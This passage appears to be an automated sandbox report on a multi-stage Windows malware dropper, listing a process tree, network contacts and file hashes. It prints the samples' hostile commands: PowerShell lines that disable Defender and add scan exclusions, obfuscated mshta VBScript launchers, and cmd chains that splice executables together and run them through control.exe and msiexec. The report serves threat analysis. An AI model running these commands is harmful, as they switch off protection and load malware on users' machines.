| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06ebc37d1c94352.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe
"C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe
Sat0663b341399ee.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe
Sat062000ca9aa6.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe
Sat0647140c100d63.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0619212f22dd7.exe
Sat0619212f22dd7.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe
Sat0618d93ac2c5c.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06ebc37d1c94352.exe
Sat06ebc37d1c94352.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe
Sat06f5ed0e3bb24.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat060fd7e42d2.exe
Sat060fd7e42d2.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe
Sat0675f75df01bdb.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3952 -ip 3952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1428 -ip 1428
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1028 -ip 1028
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 360
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE(CReAteObJect("WScRipT.ShELL" ).RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """"== """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F ", 0 , TrUe ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 840
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""== "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1028 -ip 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 844
C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe
H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5
C:\Windows\SysWOW64\taskkill.exe
taskkill -Im "Sat06f5ed0e3bb24.exe" /F
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE(CReAteObJect("WScRipT.ShELL" ).RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5""== """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F ", 0 , TrUe ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1028 -ip 1028
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5"== "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sat0663b341399ee.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 840
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1028 -ip 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 944
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE( CREAteobjEcT( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ& CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " ,0 ,True ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1028 -ip 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 972
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ& CoPY /Y /b iIKZCUV.MQ +6H87pFZ.4 +FDKD47Ef.I1+U56d.R+ JB946RB.I7A + Q_tW.pL+BTDIJ1.FYL+ FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1028 -ip 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 992
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /y .\xHnBBPN.0kM
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1028 -ip 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 844
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1028 -ip 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 932
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Sat0675f75df01bdb.exe" /f
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gazrxlog.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | whealclothing.xyz | udp |
| US | 8.8.8.8:53 | my-all-group.bar | udp |
| US | 8.8.8.8:53 | m525-blockchain31432.bar | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| FR | 91.121.67.60:23325 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| N/A | 127.0.0.1:65269 | tcp | |
| N/A | 127.0.0.1:65271 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.133.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:23325 | tcp | |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:23325 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:23325 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:23325 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:23325 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | c93901703b1d556d494f7a31ffb04720 |
| SHA1 | d14e2dc239ac85e6020f1fc4c035f7d2ea72d262 |
| SHA256 | 0d5b2226f4199a3891ec836c5b54023595b4aa06d4a80e816a8d6545a0bb3631 |
| SHA512 | 3e31e881d7b7c74baa5ea0e8d97f86dfc6feb06ec7061f30891b7736477f2888fdb58ccaa4d8ea764249191c89e5897954515b6bfdfe6a45d51640c63c20e900 |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe
| MD5 | a979670adefae9ab376382f3229f3f28 |
| SHA1 | 5b5b75a789e46a2f8ac02fba3d895fa968387c9b |
| SHA256 | a8ae45e63487b6dd93bf61429d996be4abc922785e893717cdecd84b0b6f2040 |
| SHA512 | f023b21556d5ba5cd747f02ccc99ee1a27fea1d1c675615efa31664301b53dacb253f1b92356a8aea7ab0eba77e89d0fea7d0ba088bc17599fe55278e0fb744b |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/3952-66-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3952-65-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3952-69-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3952-75-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3952-74-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3952-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3952-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1084-76-0x0000000002670000-0x00000000026A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe
| MD5 | 7c6b2dc2c253c2a6a3708605737aa9ae |
| SHA1 | cf4284f29f740b4925fb2902f7c3f234a5744718 |
| SHA256 | b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba |
| SHA512 | 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07 |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06ebc37d1c94352.exe
| MD5 | e9133ca1a95483a3331d0f336685302d |
| SHA1 | 48c1348e20b26be8227ed63a1db0f13716f1b8e3 |
| SHA256 | 1145ee6af1fb495cb10eda71b3377e5ff6a21224c613f598c1c736fb6eaac58b |
| SHA512 | 009c74131d2fa256e55a4735eee2b498a673a7857635e78f12e442b27025a99562356ccb8db15c4119e6b2ff477a07f85db8290f58f4821626bae0f729b61f57 |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0619212f22dd7.exe
| MD5 | 854ea0bc0602795b95da3be8257c530f |
| SHA1 | f243a71edc902ed91d0f990630a73d0d01828c73 |
| SHA256 | c01e2d31948bc4de2df55929062171e7dbc85b84ee764b799520d6f0740e1e1e |
| SHA512 | 2a2b55cdbc3d62fc26af219d88b31f87782a8a550d273997d6d383a877c85529c8f0c7983c77ef4f176a2ce32119fd8733658aeb86de9215629c0e6012ce544c |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe
| MD5 | 0e05650d436fd4d92775cd4f65973870 |
| SHA1 | 4d13aaa6b18630d0c89400cee5933130f03bd762 |
| SHA256 | 42c9a8d4eba1a23988476036c02318b3452e3ba835cb08786771ba63f6803b16 |
| SHA512 | 6cf7a676cc7d5114293add15dd8fe029ef7e145183ac550600e7c0c85be33e0b2c42f0456838807971c4e122599a7d42fc33f44ca606cf24fbaaf8b43196ac08 |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe
| MD5 | dd2fdd69b9db1cf5764dcfd429a1cf5e |
| SHA1 | c45f13f1e2d166ff7ea70786d51b2fdd3bdea2e8 |
| SHA256 | d22db6b8e674124371143c301994af4326668dbdfe3dcdc5fdd949d066057afe |
| SHA512 | c4aa0a831701e0ac9ca5bf7da6d46cd1a02d44248a2a4e85a3c79205182d245490245bdd90a357def492bb984249987097af70aed71331c12f8e238b10f2b60d |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat060fd7e42d2.exe
| MD5 | 29c9683aa48f1e3a29168f6b0ff3be04 |
| SHA1 | f2fde0bb1404e724387c4a4445d3e7c2c07d8d3f |
| SHA256 | e46b9e2dd407bf942a3d19b75277ae6893a0b6c87e2df9d6047a9b35ebc53901 |
| SHA512 | a7092b9e781512a6f8f2fdcefb45cfb026a6e1f8762b06c0e969c8d52389d22e3d111ae67ba82bf49ad462953091def927ba911eb7dabee061f68d4aacde9891 |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe
| MD5 | 10e13cc7b41d162ab578256f27d297b1 |
| SHA1 | 1d938b7e6e99951d9b8139f078483539120021e6 |
| SHA256 | 7c91657c83118c91043fcdb9d616fbf219acc7ea7d793e3276e8ee801d1576c9 |
| SHA512 | 22769c54259f0f82eed0f6d8d8c0d0040acf276baab8e75ed7832c771f1544939918ada9d1bc386acca0db84a0291f5932fff0f5d131e1127aff87811353e3cd |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe
| MD5 | 1cc8a64b178076dca421fedc3a248a56 |
| SHA1 | db8ed444965577dfb6db4f92ddd8d96a157ddea5 |
| SHA256 | 1f7a19b62d2e0dfddefe2d8e829bd1af457806d61bc650aa9e3ed340a0886345 |
